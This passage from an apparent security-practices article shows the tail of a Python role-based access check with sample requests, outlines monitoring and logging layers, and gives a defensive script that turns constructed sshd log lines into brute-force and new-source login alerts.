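            return False, f"{src_ip} is outside the {role} network allowlist"
    if policy["mfa"] and not mfa:
        return False, "MFA required for this role"
    if project is not None and user not in PROJECT_MEMBERS.get(project, set()):
        return False, f"{user} is not a member of {project}"
    return True, "ok"


NIGHT = datetime(2024, 1, 15, 3, 0, tzinfo=timezone.utc)
DAY = datetime(2024, 1, 15, 10, 0, tzinfo=timezone.utc)
EVENING = datetime(2024, 1, 15, 20, 0, tzinfo=timezone.utc)

SAMPLE_REQUESTS = [   # (user, role, action, src_ip, when, mfa, project); constructed
    ("alice", "admin", "users:write", "10.1.2.3", NIGHT, True, None),          # allowed
    ("carol", "contractor", "tickets:write", "198.51.100.5", DAY, False, None),  # not in role
    ("carol", "contractor", "tickets:read", "198.51.100.5", EVENING, False, None),  # after hours
    ("carol", "contractor", "tickets:read", "198.51.100.5", DAY, False, None),   # allowed
    ("bob", "admin", "users:write", "203.0.113.9", DAY, True, None),           # off allowlist
    ("bob", "admin", "users:write", "10.0.0.5", DAY, False, None),             # no MFA
    ("dave", "analyst", "logs:read", "172.16.0.8", DAY, True, "project-x"),    # not a member
    ("alice", "admin", "logs:read", "10.0.0.5", DAY, True, "project-x"),       # allowed
]


def run_samples():
    """Evaluate SAMPLE_REQUESTS; returns [(user, action, allowed), ...]."""
    return [(u, a, authorize(u, r, a, ip, t, mfa, proj)[0])
            for u, r, a, ip, t, mfa, proj in SAMPLE_REQUESTS]


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(req[0], req[2], "->", authorize(*req))
```

Every denial carries a reason string because the decision itself is what the audit log should record; an access log that only shows successes cannot reveal the probing that precedes a breach.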

Monitoring & Logging

Continuous monitoring of networks, systems, and user activities is crucial for detection:

Network - Traffic monitoring, IDS/IPS detects network anomalies and known attack patterns (Stratagems 3, 13). Essential on perimeters.

Endpoints - Server and endpoint monitoring tracks activities, configuration changes, and events for anomalies (Stratagems 18, 25). Critical inside networks.

User - Logging and analyzing user actions like logins and data access spots insider threats (Stratagem 21). Requires feeding logs to a SIEM.

Application - Application layer monitoring examines transactions for signs of abuse, data exfiltration, or fraud (Stratagems 5, 17).

Audit logs - Audit logs from systems and authentication servers should feed into monitoring and analytics (Stratagems 23, 32).

Security analytics - Machine learning applied to large datasets helps surface abnormal incidents that require investigation (Stratagems 4, 16).

Monitoring and logging require retention policies, redundancy, and protection to preserve evidence in case of anti-forensics attempts. They generate massive data requiring thoughtful analysis to avoid information overload.
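
The user-monitoring and behavioral items above are concrete once the logs are in one place: the SIEM rules are correlations over a stream of events. The following is an added example, not code from the original article: it parses sshd syslog lines and raises a brute-force alert when one source exceeds a failure threshold inside a sliding window, a high-severity alert when a success follows such a burst from the same source, and a new-source alert when a user logs in from an address never seen for them. KNOWN_SOURCES is an assumed per-user baseline, the thresholds are assumptions, and SAMPLE_LOG is constructed in the sshd syslog format.

```python
"""Correlate SSH authentication log lines into alerts: brute-force bursts,
a success that follows a burst, and logins from sources never seen for a user.

Added example, not code from the original article. KNOWN_SOURCES is an assumed
per-user baseline; SAMPLE_LOG is constructed in the sshd syslog format.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)
FAIL_THRESHOLD = 5                    # assumed
WINDOW = timedelta(minutes=5)         # assumed
KNOWN_SOURCES = {"deploy": {"10.0.0.12", "10.0.0.13"}, "alice": {"10.0.0.12"}}   # assumed baseline


def parse(line, year=2024):
    """Turn one sshd syslog line into an event dict, or None for lines we ignore."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")   # syslog omits the year
    return {"ts": ts, "host": m["host"], "result": m["result"], "user": m["user"], "ip": m["ip"]}


def correlate(lines):
    """Stream lines in order and return the alerts a SIEM rule set would raise."""
    alerts = []
    recent_failures = defaultdict(deque)     # ip -> timestamps of failures inside WINDOW
    for line in lines:
        ev = parse(line)
        if ev is None:
            continue
        q = recent_failures[ev["ip"]]
        while q and ev["ts"] - q[0] > WINDOW:
            q.popleft()
        if ev["result"] == "Failed":
            q.append(ev["ts"])
            if len(q) == FAIL_THRESHOLD:       # fire once per burst, not on every failure
                alerts.append({"kind": "brute_force", "severity": "medium", "ip": ev["ip"],
                               "user": ev["user"], "ts": ev["ts"]})
            continue
        # Accepted login: was it preceded by a burst, and is the source known for this user?
        if len(q) >= FAIL_THRESHOLD:
            alerts.append({"kind": "brute_force_success", "severity": "high", "ip": ev["ip"],
                           "user": ev["user"], "ts": ev["ts"]})
        if ev["ip"] not in KNOWN_SOURCES.get(ev["user"], set()):
            alerts.append({"kind": "new_source", "severity": "medium", "ip": ev["ip"],
                           "user": ev["user"], "ts": ev["ts"]})
    return alerts


# Constructed log excerpt: a password-guessing bot that eventually gets in,
# followed by normal activity.
SAMPLE_LOG = """\
Jan 15 02:14:01 bastion sshd[2231]: Failed password for invalid user admin from 203.0.113.9 port 51234 ssh2
Jan 15 02:14:03 bastion sshd[2233]: Failed password for invalid user oracle from 203.0.113.9 port 51240 ssh2
Jan 15 02:14:05 bastion sshd[2235]: Failed password for root from 203.0.113.9 port 51244 ssh2
Jan 15 02:14:08 bastion sshd[2238]: Failed password for deploy from 203.0.113.9 port 51250 ssh2
Jan 15 02:14:11 bastion sshd[2240]: Failed password for deploy from 203.0.113.9 port 51256 ssh2
Jan 15 02:14:14 bastion sshd[2242]: Failed password for deploy from 203.0.113.9 port 51260 ssh2
Jan 15 02:14:20 bastion sshd[2290]: Accepted password for deploy from 203.0.113.9 port 51300 ssh2
Jan 15 02:14:21 bastion sshd[2290]: pam_unix(sshd:session): session opened for user deploy by (uid=0)
Jan 15 08:03:12 bastion sshd[3102]: Accepted publickey for alice from 10.0.0.12 port 40212 ssh2
Jan 15 08:10:45 bastion sshd[3150]: Failed password for alice from 10.0.0.40 port 40300 ssh2
""".splitlines()

if __name__ == "__main__":
    for a in correlate(SAMPLE_LOG):
        print(f"{a['ts']:%H:%M:%S} {a['severity']:6s} {a['kind']:20s} {a['user']}@{a['ip']}")
```

The brute-force rule deliberately fires once, when the count reaches the threshold, rather than on every subsequent failure; that is the difference between an alert an analyst will read and the information overload noted above. The new-source baseline is the part that needs care in practice: it should be learned from history and reviewed, not typed in, and a login that trips both the burst rule and the baseline rule at once is the one to act on first.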